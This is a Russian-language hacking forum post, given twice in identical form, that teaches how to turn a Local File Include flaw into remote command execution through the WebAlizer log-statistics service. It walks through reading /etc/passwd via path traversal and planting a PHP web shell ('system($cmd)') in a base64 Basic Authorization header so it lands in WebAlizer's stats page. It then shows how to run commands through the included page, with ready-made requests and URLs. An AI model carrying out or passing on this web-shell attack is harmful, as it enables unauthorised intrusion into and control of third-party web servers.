slesh
29.05.2008, 11:16
WebAlizer в помошь при Local Include
Часто бывает что ри нахождении уязвимости типа Local Include нет возможности закачать шелл т.е.
1) Нет форумови скриптов которые сохраняют файлы
2) Не найдены логи апача или иные места возможного залива шела или к ним нет доступа
Прорыв обороны может быть осуществлен через сервис WebAlizer.
Суть сервиса - ежедневно создавать статистику работы веб сервера анализируя его логи.
Ход действий:
1. Берем подопытный сайт с local include
Также необходимо присутствие там сервиса WebAlizer
2. Узнаем путь к папке WebAlizer'a
Для этого просто смотрим файл /etc/passwd
находим там юзверя с именем webalizer и смотрим его домашнюю папку.
3. Смотрим статистику WebAlizer'a
Осуществляем это всё через всё тотже Local Include
типа script.php?file=../../../../../../../../../../домашняя_папка_WebAlizer'a/index.html
От туда берем ссылку на статистику последнего месяца. А именно имя файла. ЧТото типа такого:usage_200804.html
4. Выбираем место для шела
Чаще всего подходящим местом бывает имя пользователя, потому что редко встречается и довольно легко попадает в таблицу статистики.
5. Заливка шела
Браузер не даст нам просто так закинуть шел в имеи пользователя, по этому сделаешь запрос в ручную.
Который потом отошлем через телнет или Ip-Tools. Промежуточный шелл будет у нас таким:
<? system($cmd); ?>
Для возможности заливки необходимо составить запрос авториации примерно такого вида:
GET / HTTP/1.1
Host: site.com
Authorization: Basic PD8gc3lzdGVtKCRjbWQpOyA/Pjo=
Эта строка представляет собой текст base64('<? system($cmd); ?>: ');
Обратити внимание на то, что в конце обязательно должно стоять двоеточие и пробел. (\\В видео есть ошибка в этом месте\\)
После отправки данного запроса необходимо подождать около суток, чтобы WebAlizer провел анализ логов апача
6. Непосредственно выполнение шела
После анализа логов будет обновлен файл статистики текущего месяца в котором будет уже наш шелл который мы выполним так:site.com/scritp.php?file=../../../../../../../../домашняя_папка_WebAlizer'a/usage_200804.html&cmd=ls
Остальное дело уже простое и банальное. ;)
Скачать демонстрационное видео можно тут: http://oasis.xost.ru/final.rar
Часто бывает что ри нахождении уязвимости типа Local Include нет возможности закачать шелл т.е.
1) Нет форумови скриптов которые сохраняют файлы
2) Не найдены логи апача или иные места возможного залива шела или к ним нет доступа
Прорыв обороны может быть осуществлен через сервис WebAlizer.
Суть сервиса - ежедневно создавать статистику работы веб сервера анализируя его логи.
Ход действий:
1. Берем подопытный сайт с local include
Также необходимо присутствие там сервиса WebAlizer
2. Узнаем путь к папке WebAlizer'a
Для этого просто смотрим файл /etc/passwd
находим там юзверя с именем webalizer и смотрим его домашнюю папку.
3. Смотрим статистику WebAlizer'a
Осуществляем это всё через всё тотже Local Include
типа script.php?file=../../../../../../../../../../домашняя_папка_WebAlizer'a/index.html
От туда берем ссылку на статистику последнего месяца. А именно имя файла. ЧТото типа такого:usage_200804.html
4. Выбираем место для шела
Чаще всего подходящим местом бывает имя пользователя, потому что редко встречается и довольно легко попадает в таблицу статистики.
5. Заливка шела
Браузер не даст нам просто так закинуть шел в имеи пользователя, по этому сделаешь запрос в ручную.
Который потом отошлем через телнет или Ip-Tools. Промежуточный шелл будет у нас таким:
<? system($cmd); ?>
Для возможности заливки необходимо составить запрос авториации примерно такого вида:
GET / HTTP/1.1
Host: site.com
Authorization: Basic PD8gc3lzdGVtKCRjbWQpOyA/Pjo=
Эта строка представляет собой текст base64('<? system($cmd); ?>: ');
Обратити внимание на то, что в конце обязательно должно стоять двоеточие и пробел. (\\В видео есть ошибка в этом месте\\)
После отправки данного запроса необходимо подождать около суток, чтобы WebAlizer провел анализ логов апача
6. Непосредственно выполнение шела
После анализа логов будет обновлен файл статистики текущего месяца в котором будет уже наш шелл который мы выполним так:site.com/scritp.php?file=../../../../../../../../домашняя_папка_WebAlizer'a/usage_200804.html&cmd=ls
Остальное дело уже простое и банальное. ;)
Скачать демонстрационное видео можно тут: http://oasis.xost.ru/final.rar